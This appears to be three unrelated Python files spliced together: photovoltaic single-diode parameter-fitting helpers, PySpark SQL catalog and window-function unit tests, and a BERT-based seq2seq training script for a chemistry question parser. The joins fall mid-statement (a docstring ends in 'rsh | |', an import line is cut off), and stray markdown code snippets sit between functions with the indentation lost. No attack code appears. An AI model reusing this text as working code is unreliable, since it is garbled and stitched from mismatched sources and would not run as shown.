first_idx = np.searchsorted(v, vlim * v_oc)
for idx in range(first_idx, len(v)):
coef = np.polyfit(v[:idx], i[:idx], deg=1)
if coef[0] < 0:
# intercept term
beta0 = coef[1].item()
# sign change of slope to get positive parameter value
beta1 = -coef[0].item()
break
if any(np.isnan([beta0, beta1])):
raise RuntimeError("Parameter extraction failed: beta0={}, beta1={}"
.format(beta0, beta1))
else:
return beta0, beta1
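Step 3 of the extraction fits a line to the low-voltage portion; `np.polyfit(deg=1)` is ordinary least squares, which can be sketched directly. `line_fit` is a hypothetical helper returning (intercept, slope), so `beta0` is the intercept and `beta1` the negated slope:

```python
def line_fit(xs, ys):
    """Ordinary least-squares line fit -- the same computation
    np.polyfit(v, i, deg=1) performs inside _sandia_beta0_beta1."""
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n
    sxx = sum((x - mx) ** 2 for x in xs)
    sxy = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    slope = sxy / sxx
    return my - slope * mx, slope  # (intercept, slope)
```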
def _sandia_beta3_beta4(voltage, current, beta0, beta1, ilim, i_sc):
    # Used by fit_sandia_simple.
# Subtract the IV curve from the linear fit.
y = beta0 - beta1 * voltage - current
x = np.array([np.ones_like(voltage), voltage, current]).T
# Select points where y > ilim * i_sc to regress log(y) onto x
idx = (y > ilim * i_sc)
result = np.linalg.lstsq(x[idx], np.log(y[idx]), rcond=RCOND)
coef = result[0]
beta3 = coef[1].item()
beta4 = coef[2].item()
if any(np.isnan([beta3, beta4])):
raise RuntimeError("Parameter extraction failed: beta3={}, beta4={}"
.format(beta3, beta4))
else:
return beta3, beta4
def _sandia_simple_params(beta0, beta1, beta3, beta4, v_mp, i_mp, v_oc):
# Used by fit_sandia_simple.
nNsVth = 1.0 / beta3
rs = beta4 / beta3
gsh = beta1 / (1.0 - rs * beta1)
rsh = 1.0 / gsh
iph = (1 + gsh * rs) * beta0
# calculate I0
io_vmp = _calc_I0(v_mp, i_mp, iph, gsh, rs, nNsVth)
io_voc = _calc_I0(v_oc, 0, iph, gsh, rs, nNsVth)
if any(np.isnan([io_vmp, io_voc])) or ((io_vmp <= 0) and (io_voc <= 0)):
raise RuntimeError("Parameter extraction failed: I0 is undetermined.")
elif (io_vmp > 0) and (io_voc > 0):
io = 0.5 * (io_vmp + io_voc)
elif (io_vmp > 0):
io = io_vmp
else: # io_voc > 0
io = io_voc
return iph, io, rs, rsh, nNsVth
def _calc_I0(voltage, current, iph, gsh, rs, nNsVth):
return (iph - current - gsh * (voltage + rs * current)) / \
np.expm1((voltage + rs * current) / nNsVth)
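With the five parameters in hand, the single diode equation itself can be evaluated at a trial current. This sketch (hypothetical helper; a direct evaluation, not a solver for the implicit I) uses `math.expm1` just as `_calc_I0` uses `np.expm1`:

```python
import math

def diode_current(v, i_trial, iph, io, rs, gsh, nNsVth):
    """Right-hand side of I = IL - I0*(exp((V + I*Rs)/nNsVth) - 1)
    - Gp*(V + I*Rs), evaluated at a trial current i_trial."""
    arg = (v + i_trial * rs) / nNsVth
    return iph - io * math.expm1(arg) - gsh * (v + i_trial * rs)
```

At V = 0 with Rs = 0 and Gp = 0 the expression collapses to the photocurrent, a quick sanity check on the sign conventions.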
def _fit_sandia_cocontent(voltage, current, nsvth):
"""
Regression technique to fit the single diode equation to data for a single
IV curve.
In general, not reliable for estimating parameters other than Rsh.
Parameters
----------
voltage : numeric
voltage for the IV curve in increasing order, the first value must be
0, the last value is taken as ``Voc``. [V]
current : numeric
current for the IV curve corresponding to ``voltage``, the first value
is taken as ``Isc``, the last value must be 0. [A]
nsvth : numeric
the thermal voltage for the module, equal to ``Ns`` (number of cells in
series) times ``Vth`` (thermal voltage per cell). [V]
Returns
-------
iph : numeric
photocurrent [A]
io : numeric
dark current [A]
rs : numeric
        series resistance [ohm]
rsh | |
= dict((f.name, f) for f in spark.catalog.listFunctions("default"))
self.assertTrue(len(functions) > 200)
self.assertTrue("+" in functions)
self.assertTrue("like" in functions)
self.assertTrue("month" in functions)
self.assertTrue("to_date" in functions)
self.assertTrue("to_timestamp" in functions)
self.assertTrue("to_unix_timestamp" in functions)
self.assertTrue("current_database" in functions)
self.assertEquals(functions["+"], Function(
name="+",
description=None,
className="org.apache.spark.sql.catalyst.expressions.Add",
isTemporary=True))
self.assertEquals(functions, functionsDefault)
spark.catalog.registerFunction("temp_func", lambda x: str(x))
spark.sql("CREATE FUNCTION func1 AS 'org.apache.spark.data.bricks'")
spark.sql("CREATE FUNCTION some_db.func2 AS 'org.apache.spark.data.bricks'")
newFunctions = dict((f.name, f) for f in spark.catalog.listFunctions())
newFunctionsSomeDb = dict((f.name, f) for f in spark.catalog.listFunctions("some_db"))
self.assertTrue(set(functions).issubset(set(newFunctions)))
self.assertTrue(set(functions).issubset(set(newFunctionsSomeDb)))
self.assertTrue("temp_func" in newFunctions)
self.assertTrue("func1" in newFunctions)
self.assertTrue("func2" not in newFunctions)
self.assertTrue("temp_func" in newFunctionsSomeDb)
self.assertTrue("func1" not in newFunctionsSomeDb)
self.assertTrue("func2" in newFunctionsSomeDb)
self.assertRaisesRegexp(
AnalysisException,
"does_not_exist",
lambda: spark.catalog.listFunctions("does_not_exist"))
def test_list_columns(self):
from pyspark.sql.catalog import Column
spark = self.spark
spark.catalog._reset()
spark.sql("CREATE DATABASE some_db")
spark.sql("CREATE TABLE tab1 (name STRING, age INT) USING parquet")
spark.sql("CREATE TABLE some_db.tab2 (nickname STRING, tolerance FLOAT) USING parquet")
columns = sorted(spark.catalog.listColumns("tab1"), key=lambda c: c.name)
columnsDefault = sorted(spark.catalog.listColumns("tab1", "default"), key=lambda c: c.name)
self.assertEquals(columns, columnsDefault)
self.assertEquals(len(columns), 2)
self.assertEquals(columns[0], Column(
name="age",
description=None,
dataType="int",
nullable=True,
isPartition=False,
isBucket=False))
self.assertEquals(columns[1], Column(
name="name",
description=None,
dataType="string",
nullable=True,
isPartition=False,
isBucket=False))
columns2 = sorted(spark.catalog.listColumns("tab2", "some_db"), key=lambda c: c.name)
self.assertEquals(len(columns2), 2)
self.assertEquals(columns2[0], Column(
name="nickname",
description=None,
dataType="string",
nullable=True,
isPartition=False,
isBucket=False))
self.assertEquals(columns2[1], Column(
name="tolerance",
description=None,
dataType="float",
nullable=True,
isPartition=False,
isBucket=False))
self.assertRaisesRegexp(
AnalysisException,
"tab2",
lambda: spark.catalog.listColumns("tab2"))
self.assertRaisesRegexp(
AnalysisException,
"does_not_exist",
lambda: spark.catalog.listColumns("does_not_exist"))
def test_cache(self):
spark = self.spark
spark.createDataFrame([(2, 2), (3, 3)]).createOrReplaceTempView("tab1")
spark.createDataFrame([(2, 2), (3, 3)]).createOrReplaceTempView("tab2")
self.assertFalse(spark.catalog.isCached("tab1"))
self.assertFalse(spark.catalog.isCached("tab2"))
spark.catalog.cacheTable("tab1")
self.assertTrue(spark.catalog.isCached("tab1"))
self.assertFalse(spark.catalog.isCached("tab2"))
spark.catalog.cacheTable("tab2")
spark.catalog.uncacheTable("tab1")
self.assertFalse(spark.catalog.isCached("tab1"))
self.assertTrue(spark.catalog.isCached("tab2"))
spark.catalog.clearCache()
self.assertFalse(spark.catalog.isCached("tab1"))
self.assertFalse(spark.catalog.isCached("tab2"))
self.assertRaisesRegexp(
AnalysisException,
"does_not_exist",
lambda: spark.catalog.isCached("does_not_exist"))
self.assertRaisesRegexp(
AnalysisException,
"does_not_exist",
lambda: spark.catalog.cacheTable("does_not_exist"))
self.assertRaisesRegexp(
AnalysisException,
"does_not_exist",
lambda: spark.catalog.uncacheTable("does_not_exist"))
def test_read_text_file_list(self):
df = self.spark.read.text(['python/test_support/sql/text-test.txt',
'python/test_support/sql/text-test.txt'])
count = df.count()
self.assertEquals(count, 4)
def test_BinaryType_serialization(self):
# Pyrolite version <= 4.9 could not serialize BinaryType with Python3 SPARK-17808
schema = StructType([StructField('mybytes', BinaryType())])
data = [[bytearray(b'here is my data')],
[bytearray(b'and here is some more')]]
df = self.spark.createDataFrame(data, schema=schema)
df.collect()
def test_bucketed_write(self):
data = [
(1, "foo", 3.0), (2, "foo", 5.0),
(3, "bar", -1.0), (4, "bar", 6.0),
]
df = self.spark.createDataFrame(data, ["x", "y", "z"])
def count_bucketed_cols(names, table="pyspark_bucket"):
"""Given a sequence of column names and a table name
            query the catalog and return the number of columns which are
used for bucketing
"""
cols = self.spark.catalog.listColumns(table)
num = len([c for c in cols if c.name in names and c.isBucket])
return num
# Test write with one bucketing column
df.write.bucketBy(3, "x").mode("overwrite").saveAsTable("pyspark_bucket")
self.assertEqual(count_bucketed_cols(["x"]), 1)
self.assertSetEqual(set(data), set(self.spark.table("pyspark_bucket").collect()))
# Test write two bucketing columns
df.write.bucketBy(3, "x", "y").mode("overwrite").saveAsTable("pyspark_bucket")
self.assertEqual(count_bucketed_cols(["x", "y"]), 2)
self.assertSetEqual(set(data), set(self.spark.table("pyspark_bucket").collect()))
# Test write with bucket and sort
df.write.bucketBy(2, "x").sortBy("z").mode("overwrite").saveAsTable("pyspark_bucket")
self.assertEqual(count_bucketed_cols(["x"]), 1)
self.assertSetEqual(set(data), set(self.spark.table("pyspark_bucket").collect()))
# Test write with a list of columns
df.write.bucketBy(3, ["x", "y"]).mode("overwrite").saveAsTable("pyspark_bucket")
self.assertEqual(count_bucketed_cols(["x", "y"]), 2)
self.assertSetEqual(set(data), set(self.spark.table("pyspark_bucket").collect()))
# Test write with bucket and sort with a list of columns
(df.write.bucketBy(2, "x")
.sortBy(["y", "z"])
.mode("overwrite").saveAsTable("pyspark_bucket"))
self.assertSetEqual(set(data), set(self.spark.table("pyspark_bucket").collect()))
# Test write with bucket and sort with multiple columns
(df.write.bucketBy(2, "x")
.sortBy("y", "z")
.mode("overwrite").saveAsTable("pyspark_bucket"))
self.assertSetEqual(set(data), set(self.spark.table("pyspark_bucket").collect()))
@unittest.skipIf(not _have_pandas, "Pandas not installed")
def test_to_pandas(self):
import numpy as np
schema = StructType().add("a", IntegerType()).add("b", StringType())\
.add("c", BooleanType()).add("d", FloatType())
data = [
(1, "foo", True, 3.0), (2, "foo", True, 5.0),
(3, "bar", False, -1.0), (4, "bar", False, 6.0),
]
df = self.spark.createDataFrame(data, schema)
types = df.toPandas().dtypes
self.assertEquals(types[0], np.int32)
self.assertEquals(types[1], np.object)
self.assertEquals(types[2], np.bool)
self.assertEquals(types[3], np.float32)
class HiveSparkSubmitTests(SparkSubmitTests):
def test_hivecontext(self):
# This test checks that HiveContext is using Hive metastore (SPARK-16224).
# It sets a metastore url and checks if there is a derby dir created by
# Hive metastore. If this derby dir exists, HiveContext is using
# Hive metastore.
metastore_path = os.path.join(tempfile.mkdtemp(), "spark16224_metastore_db")
metastore_URL = "jdbc:derby:;databaseName=" + metastore_path + ";create=true"
hive_site_dir = os.path.join(self.programDir, "conf")
hive_site_file = self.createTempFile("hive-site.xml", ("""
|<configuration>
| <property>
| <name>javax.jdo.option.ConnectionURL</name>
| <value>%s</value>
| </property>
|</configuration>
""" % metastore_URL).lstrip(), "conf")
script = self.createTempFile("test.py", """
|import os
|
|from pyspark.conf import SparkConf
|from pyspark.context import SparkContext
|from pyspark.sql import HiveContext
|
|conf = SparkConf()
|sc = SparkContext(conf=conf)
|hive_context = HiveContext(sc)
|print(hive_context.sql("show databases").collect())
""")
proc = subprocess.Popen(
[self.sparkSubmit, "--master", "local-cluster[1,1,1024]",
"--driver-class-path", hive_site_dir, script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("default", out.decode('utf-8'))
self.assertTrue(os.path.exists(metastore_path))
class SQLTests2(ReusedPySparkTestCase):
@classmethod
def setUpClass(cls):
ReusedPySparkTestCase.setUpClass()
cls.spark = SparkSession(cls.sc)
@classmethod
def tearDownClass(cls):
ReusedPySparkTestCase.tearDownClass()
cls.spark.stop()
# We can't include this test in SQLTests because it stops the class's SparkContext,
# causing other tests to fail.
def test_sparksession_with_stopped_sparkcontext(self):
self.sc.stop()
sc = SparkContext('local[4]', self.sc.appName)
spark = SparkSession.builder.getOrCreate()
df = spark.createDataFrame([(1, 2)], ["c", "c"])
df.collect()
class UDFInitializationTests(unittest.TestCase):
def tearDown(self):
if SparkSession._instantiatedSession is not None:
SparkSession._instantiatedSession.stop()
if SparkContext._active_spark_context is not None:
SparkContext._active_spark_context.stop()
def test_udf_init_shouldnt_initialize_context(self):
from pyspark.sql.functions import UserDefinedFunction
UserDefinedFunction(lambda x: x, StringType())
self.assertIsNone(
SparkContext._active_spark_context,
"SparkContext shouldn't be initialized when UserDefinedFunction is created."
)
self.assertIsNone(
SparkSession._instantiatedSession,
"SparkSession shouldn't be initialized when UserDefinedFunction is created."
)
class HiveContextSQLTests(ReusedPySparkTestCase):
@classmethod
def setUpClass(cls):
ReusedPySparkTestCase.setUpClass()
cls.tempdir = tempfile.NamedTemporaryFile(delete=False)
try:
cls.sc._jvm.org.apache.hadoop.hive.conf.HiveConf()
except py4j.protocol.Py4JError:
cls.tearDownClass()
raise unittest.SkipTest("Hive is not available")
except TypeError:
cls.tearDownClass()
raise unittest.SkipTest("Hive is not available")
os.unlink(cls.tempdir.name)
cls.spark = HiveContext._createForTesting(cls.sc)
cls.testData = [Row(key=i, value=str(i)) for i in range(100)]
cls.df = cls.sc.parallelize(cls.testData).toDF()
@classmethod
def tearDownClass(cls):
ReusedPySparkTestCase.tearDownClass()
shutil.rmtree(cls.tempdir.name, ignore_errors=True)
def test_save_and_load_table(self):
df = self.df
tmpPath = tempfile.mkdtemp()
shutil.rmtree(tmpPath)
df.write.saveAsTable("savedJsonTable", "json", "append", path=tmpPath)
actual = self.spark.createExternalTable("externalJsonTable", tmpPath, "json")
self.assertEqual(sorted(df.collect()),
sorted(self.spark.sql("SELECT * FROM savedJsonTable").collect()))
self.assertEqual(sorted(df.collect()),
sorted(self.spark.sql("SELECT * FROM externalJsonTable").collect()))
self.assertEqual(sorted(df.collect()), sorted(actual.collect()))
self.spark.sql("DROP TABLE externalJsonTable")
df.write.saveAsTable("savedJsonTable", "json", "overwrite", path=tmpPath)
schema = StructType([StructField("value", StringType(), True)])
actual = self.spark.createExternalTable("externalJsonTable", source="json",
schema=schema, path=tmpPath,
noUse="this option will not be used")
self.assertEqual(sorted(df.collect()),
sorted(self.spark.sql("SELECT * FROM savedJsonTable").collect()))
self.assertEqual(sorted(df.select("value").collect()),
sorted(self.spark.sql("SELECT * FROM externalJsonTable").collect()))
self.assertEqual(sorted(df.select("value").collect()), sorted(actual.collect()))
self.spark.sql("DROP TABLE savedJsonTable")
self.spark.sql("DROP TABLE externalJsonTable")
defaultDataSourceName = self.spark.getConf("spark.sql.sources.default",
"org.apache.spark.sql.parquet")
self.spark.sql("SET spark.sql.sources.default=org.apache.spark.sql.json")
df.write.saveAsTable("savedJsonTable", path=tmpPath, mode="overwrite")
actual = self.spark.createExternalTable("externalJsonTable", path=tmpPath)
self.assertEqual(sorted(df.collect()),
sorted(self.spark.sql("SELECT * FROM savedJsonTable").collect()))
self.assertEqual(sorted(df.collect()),
sorted(self.spark.sql("SELECT * FROM externalJsonTable").collect()))
self.assertEqual(sorted(df.collect()), sorted(actual.collect()))
self.spark.sql("DROP TABLE savedJsonTable")
self.spark.sql("DROP TABLE externalJsonTable")
self.spark.sql("SET spark.sql.sources.default=" + defaultDataSourceName)
shutil.rmtree(tmpPath)
def test_window_functions(self):
df = self.spark.createDataFrame([(1, "1"), (2, "2"), (1, "2"), (1, "2")], ["key", "value"])
w = Window.partitionBy("value").orderBy("key")
from pyspark.sql import functions as F
sel = df.select(df.value, df.key,
F.max("key").over(w.rowsBetween(0, 1)),
F.min("key").over(w.rowsBetween(0, 1)),
F.count("key").over(w.rowsBetween(float('-inf'), float('inf'))),
F.row_number().over(w),
F.rank().over(w),
F.dense_rank().over(w),
F.ntile(2).over(w))
rs = sorted(sel.collect())
expected = [
("1", 1, 1, 1, 1, 1, 1, 1, 1),
("2", 1, 1, 1, 3, 1, 1, 1, 1),
("2", 1, 2, 1, 3, 2, 1, 1, 1),
("2", 2, 2, 2, 3, 3, 3, 2, 2)
]
for r, ex in zip(rs, expected):
self.assertEqual(tuple(r), ex[:len(r)])
def test_window_functions_without_partitionBy(self):
df = self.spark.createDataFrame([(1, "1"), (2, "2"), (1, "2"), (1, "2")], ["key", "value"])
w = Window.orderBy("key", df.value)
from pyspark.sql import functions as F
sel = df.select(df.value, df.key,
F.max("key").over(w.rowsBetween(0, 1)),
F.min("key").over(w.rowsBetween(0, 1)),
F.count("key").over(w.rowsBetween(float('-inf'), float('inf'))),
F.row_number().over(w),
F.rank().over(w),
F.dense_rank().over(w),
F.ntile(2).over(w))
rs = sorted(sel.collect())
expected = [
("1", 1, 1, 1, 4, 1, 1, 1, 1),
("2", 1, 1, 1, 4, 2, 2, 2, 1),
("2", 1, 2, 1, 4, 3, 2, 2, 2),
("2", 2, 2, 2, 4, 4, 4, 3, 2)
]
for r, ex in zip(rs, expected):
self.assertEqual(tuple(r), ex[:len(r)])
def test_window_functions_cumulative_sum(self):
df = self.spark.createDataFrame([("one", 1), ("two", 2)], ["key", "value"])
from pyspark.sql import functions as F
# Test cumulative sum
sel = df.select(
df.key,
F.sum(df.value).over(Window.rowsBetween(Window.unboundedPreceding, 0)))
rs = sorted(sel.collect())
expected = [("one", 1), ("two", 3)]
for r, ex in zip(rs, expected):
self.assertEqual(tuple(r), ex[:len(r)])
# Test boundary values less than JVM's Long.MinValue and make sure we don't overflow
sel = df.select(
df.key,
F.sum(df.value).over(Window.rowsBetween(Window.unboundedPreceding - 1, 0)))
rs = sorted(sel.collect())
expected = [("one", 1), ("two", 3)]
for r, ex in zip(rs, expected):
self.assertEqual(tuple(r), ex[:len(r)])
# Test boundary values greater than JVM's Long.MaxValue and make sure we don't overflow
frame_end = Window.unboundedFollowing + 1
sel = df.select(
df.key,
F.sum(df.value).over(Window.rowsBetween(Window.currentRow, frame_end)))
rs = sorted(sel.collect())
expected = [("one", 3), ("two", 2)]
for r, ex in zip(rs, expected):
self.assertEqual(tuple(r), ex[:len(r)])
def test_collect_functions(self):
df = self.spark.createDataFrame([(1, "1"), (2, "2"), (1, "2"), (1, "2")], ["key", "value"])
from pyspark.sql import functions
self.assertEqual(
sorted(df.select(functions.collect_set(df.key).alias('r')).collect()[0].r),
[1, 2])
self.assertEqual(
sorted(df.select(functions.collect_list(df.key).alias('r')).collect()[0].r),
[1, 1, 1, 2])
self.assertEqual(
sorted(df.select(functions.collect_set(df.value).alias('r')).collect()[0].r),
["1", "2"])
self.assertEqual(
sorted(df.select(functions.collect_list(df.value).alias('r')).collect()[0].r),
["1", "2", "2", "2"])
def test_limit_and_take(self):
df = self.spark.range(1, 1000, numPartitions=10)
def assert_runs_only_one_job_stage_and_task(job_group_name, f):
tracker = self.sc.statusTracker()
self.sc.setJobGroup(job_group_name, description="")
f()
jobs = tracker.getJobIdsForGroup(job_group_name)
self.assertEqual(1, len(jobs))
stages = tracker.getJobInfo(jobs[0]).stageIds
self.assertEqual(1, len(stages))
self.assertEqual(1, tracker.getStageInfo(stages[0]).numTasks)
# Regression test for SPARK-10731: take should delegate to Scala implementation
assert_runs_only_one_job_stage_and_task("take", lambda: df.take(1))
# Regression test for SPARK-17514: limit(n).collect() should perform the same as take(n)
assert_runs_only_one_job_stage_and_task("collect_limit", lambda: df.limit(1).collect())
def test_datetime_functions(self):
from pyspark.sql import functions
from datetime import
# examples/run_chemistry_parser.py
# coding=utf-8
# Copyright 2019 The HuggingFace Inc. team.
# Copyright (c) 2019 The HuggingFace Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Finetuning seq2seq models for sequence generation."""
import argparse
import functools
import logging
import os
import random
import sys
sys.path.append(r'../')
import numpy as np
from tqdm import tqdm, trange
import torch
from torch.optim import Adam
from torch.utils.data import DataLoader, RandomSampler, SequentialSampler
from transformers import (
AutoTokenizer,
BertForMaskedLM,
BertConfig,
PreTrainedEncoderDecoder,
Model2Models,
)
from utils_summarization import (
CNNDailyMailDataset,
encode_for_summarization,
fit_to_block_size,
build_lm_labels,
build_mask,
compute_token_type_ids,
)
from utils_chemistry import (ChemistryDataset,)
'''
class InputExample(object):
def __init__(self,example_id,question_input,question_varible_output=None,condition_output=None):
self.example_id=example_id
self.question_input=question_input
self.question_varible_output=question_varible_output
self.condition_output=condition_output
'''
logger = logging.getLogger(__name__)
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
def set_seed(args):
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
# ------------
# Load dataset
# ------------
def load_and_cache_examples(args, tokenizer, prefix="train"):
dataset = ChemistryDataset(tokenizer, prefix=prefix, data_dir=args.data_dir)
return dataset
def collate(data, tokenizer, input_block_size,output_block_size):
""" Collate a list of examples into padded input/output tensors. """
question_inputs=[]
question_varible_outputs=[]
condition_outputs=[]
for i,example in enumerate(data):
question_input=tokenizer.encode(example.question_input)
question_input=fit_to_block_size(question_input, input_block_size, tokenizer.pad_token_id)
question_inputs.append(question_input)
if example.question_varible_output is not None:
question_varible_output=tokenizer.encode(example.question_varible_output)
else:
question_varible_output=tokenizer.build_inputs_with_special_tokens([])
question_varible_output=fit_to_block_size(question_varible_output, output_block_size, tokenizer.pad_token_id)
question_varible_outputs.append(question_varible_output)
if example.condition_output is not None:
condition_output=tokenizer.encode(example.condition_output)
else:
condition_output=tokenizer.build_inputs_with_special_tokens([])
condition_output=fit_to_block_size(condition_output, output_block_size, tokenizer.pad_token_id)
condition_outputs.append(condition_output)
question_inputs = torch.tensor(question_inputs)
question_varible_outputs = torch.tensor(question_varible_outputs)
condition_outputs = torch.tensor(condition_outputs)
question_inputs_mask = build_mask(question_inputs, tokenizer.pad_token_id)
question_varible_outputs_mask = build_mask(question_varible_outputs, tokenizer.pad_token_id)
condition_outputs_mask = build_mask(condition_outputs, tokenizer.pad_token_id)
question_varible_outputs_mask_lm_labels = build_lm_labels(question_varible_outputs, tokenizer.pad_token_id)
condition_outputs_mask_lm_labels = build_lm_labels(condition_outputs, tokenizer.pad_token_id)
return (
question_inputs,
[question_varible_outputs,condition_outputs],
question_inputs_mask,
[question_varible_outputs_mask,condition_outputs_mask],
[question_varible_outputs_mask_lm_labels,condition_outputs_mask_lm_labels],
)
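# `fit_to_block_size` is imported from utils_summarization; its job in collate()
# above is to pad short id sequences with the pad id and truncate long ones to
# the block size. A minimal stand-in illustrating that assumed behavior (not the
# imported implementation):

```python
def pad_or_truncate(ids, block_size, pad_token_id):
    # Truncate sequences longer than block_size; right-pad shorter ones.
    if len(ids) > block_size:
        return ids[:block_size]
    return ids + [pad_token_id] * (block_size - len(ids))

padded = pad_or_truncate([101, 7592, 102], block_size=5, pad_token_id=0)
truncated = pad_or_truncate([101, 1, 2, 3, 4, 5, 102], block_size=5, pad_token_id=0)
```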
# ----------
# Optimizers
# ----------
class BertSumOptimizer(object):
""" Specific optimizer for BertSum.
As described in [1], the authors fine-tune BertSum for abstractive
summarization using two Adam Optimizers with different warm-up steps and
learning rate. They also use a custom learning rate scheduler.
[1] Liu, Yang, and <NAME>. "Text summarization with pretrained encoders."
arXiv preprint arXiv:1908.08345 (2019).
"""
def __init__(self, model, lr, warmup_steps, beta_1=0.99, beta_2=0.999, eps=1e-8):
self.encoder = model.encoder
self.decoders = model.decoders
self.lr = lr
self.warmup_steps = warmup_steps
self.decoders_parameters=[]
for decoder in model.decoders:
self.decoders_parameters+=decoder.parameters()
self.optimizers = {
"encoder": Adam(
model.encoder.parameters(),
lr=lr["encoder"],
betas=(beta_1, beta_2),
eps=eps,
),
"decoder": Adam(
self.decoders_parameters,
lr=lr["decoder"],
betas=(beta_1, beta_2),
eps=eps,
),
}
self._step = 0
def _update_rate(self, stack):
# Noam-style schedule: linear warm-up for warmup_steps, then step ** -0.5 decay.
return self.lr[stack] * min(
self._step ** (-0.5), self._step * self.warmup_steps[stack] ** (-1.5)
)
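# The rule in _update_rate is the Noam-style schedule BertSum uses: the rate
# grows linearly for warmup_steps, peaks, then decays as step ** -0.5. A
# standalone sketch of that schedule (hypothetical helper name):

```python
def noam_rate(base_lr, step, warmup_steps):
    # base_lr * min(step^-0.5, step * warmup^-1.5):
    # linear warm-up, then inverse-square-root decay.
    return base_lr * min(step ** (-0.5), step * warmup_steps ** (-1.5))

rates = [noam_rate(0.002, s, warmup_steps=100) for s in range(1, 301)]
peak_step = rates.index(max(rates)) + 1  # the two branches cross at warmup_steps
```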
def zero_grad(self):
for optimizer in self.optimizers.values():
optimizer.zero_grad()
def step(self):
self._step += 1
for stack, optimizer in self.optimizers.items():
new_rate = self._update_rate(stack)
for param_group in optimizer.param_groups:
param_group["lr"] = new_rate
optimizer.step()
# ------------
# Train
# ------------
def train(args, model, tokenizer):
""" Fine-tune the pretrained model on the corpus. """
set_seed(args)
# Load the data
args.train_batch_size = args.per_gpu_train_batch_size * max(1, args.n_gpu)
train_dataset = load_and_cache_examples(args, tokenizer, "train")
train_sampler = RandomSampler(train_dataset)
model_collate_fn = functools.partial(collate, tokenizer=tokenizer,
input_block_size=args.input_block_size,output_block_size=args.output_block_size)
train_dataloader = DataLoader(
train_dataset,
sampler=train_sampler,
batch_size=args.train_batch_size,
collate_fn=model_collate_fn,
)
# Training schedule
if args.max_steps > 0:
t_total = args.max_steps
args.num_train_epochs = t_total // (
len(train_dataloader) // args.gradient_accumulation_steps + 1
)
else:
t_total = (
len(train_dataloader)
// args.gradient_accumulation_steps
* args.num_train_epochs
)
# Prepare the optimizer
#lr = {"encoder": 0.002, "decoder": 0.2}
lr = {"encoder": args.encoder_lr, "decoder": args.decoder_lr}
#warmup_steps = {"encoder": 20000, "decoder": 10000}
warmup_steps = {"encoder": args.encoder_warmup, "decoder": args.decoder_warmup}
optimizer = BertSumOptimizer(model, lr, warmup_steps)
# Train
logger.info("***** Running training *****")
logger.info(" Num examples = %d", len(train_dataset))
logger.info(" Num Epochs = %d", args.num_train_epochs)
logger.info(
" Instantaneous batch size per GPU = %d", args.per_gpu_train_batch_size
)
logger.info(
" Total train batch size (w. parallel, distributed & accumulation) = %d",
args.train_batch_size * args.gradient_accumulation_steps
# * (torch.distributed.get_world_size() if args.local_rank != -1 else 1),
)
logger.info(" Gradient Accumulation steps = %d", args.gradient_accumulation_steps)
logger.info(" Total optimization steps = %d", t_total)
model.zero_grad()
train_iterator = trange(args.num_train_epochs, desc="Epoch", disable=False)
global_step = 0
tr_loss = 0.0
for _ in train_iterator:
epoch_iterator = tqdm(train_dataloader, desc="Iteration", disable=False)
for step, batch in enumerate(epoch_iterator):
source, target, encoder_mask, decoder_mask, lm_labels = batch
#print('source: {}'.format(source))
#print('target: {}'.format(target))
feed_source=None
feed_targets=[None]*len(target)
feed_encoder_mask=None
feed_decoder_masks=[None]*len(decoder_mask)
feed_lm_labels=[None]*len(lm_labels)
feed_source = source.to(args.device)
for i in range(len(target)):
feed_targets[i] = target[i].to(args.device)
feed_encoder_mask = encoder_mask.to(args.device)
for i in range(len(decoder_mask)):
feed_decoder_masks[i] = decoder_mask[i].to(args.device)
for i in range(len(lm_labels)):
feed_lm_labels[i] = lm_labels[i].to(args.device)
model.train()
#print('debug by zhuoyu: source = {}'.format(source))
#print('debug by zhuoyu: target = {}'.format(target))
#print('debug by zhuoyu, device:')
#print('feed source {}'.format(feed_source.device))
#print('feed target {}'.format([str(feed_target.device) for feed_target in feed_targets]))
#print('feed encoder mask {}'.format(feed_encoder_mask.device))
#print('feed decoder masks {}'.format([str(feed_decoder_mask.device) for feed_decoder_mask in feed_decoder_masks]))
#print('feed lm labels {}'.format([str(feed_lm_label.device) for feed_lm_label in feed_lm_labels]))
outputs = model(
feed_source,
feed_targets,
encoder_attention_mask=feed_encoder_mask,
decoder_attention_mask=feed_decoder_masks,
decoder_lm_labels=feed_lm_labels,
)
loss=0
for i in range(len(model.decoders)):
#print('outputs[{}][0] type: {}'.format(i,type(outputs[i][0])))
loss += outputs[i][0]
#print(loss)
if args.gradient_accumulation_steps > 1:
loss /= args.gradient_accumulation_steps
loss.backward()
tr_loss += loss.item()
if (step + 1) % args.gradient_accumulation_steps == 0:
torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)
optimizer.step()
model.zero_grad()
global_step += 1
if args.max_steps > 0 and global_step > args.max_steps:
epoch_iterator.close()
break
if args.max_steps > 0 and global_step > args.max_steps:
train_iterator.close()
break
return global_step, tr_loss / global_step
# ------------
# Train
# ------------
def evaluate(args, model, tokenizer, prefix=""):
set_seed(args)
args.eval_batch_size = args.per_gpu_eval_batch_size * max(1, args.n_gpu)
eval_dataset = load_and_cache_examples(args, tokenizer, prefix="dev")
#for example in eval_dataset.examples:
# print(example.example_id)
# print(example.question_input)
# print(example.question_varible_output)
# print(example.condition_output)
#exit(-1)
eval_sampler = SequentialSampler(eval_dataset)
model_collate_fn = functools.partial(collate, tokenizer=tokenizer,
input_block_size=args.input_block_size,output_block_size=args.output_block_size)
eval_dataloader = DataLoader(
eval_dataset, sampler=eval_sampler, batch_size=args.eval_batch_size,collate_fn=model_collate_fn,
)
# multi-gpu evaluate
#if args.n_gpu > 1:
# model = torch.nn.DataParallel(model)
logger.info("***** Running evaluation {} *****".format(prefix))
logger.info(" Num examples = %d", len(eval_dataset))
logger.info(" Batch size = %d", args.eval_batch_size)
eval_loss = 0.0
nb_eval_steps = 0
model.eval()
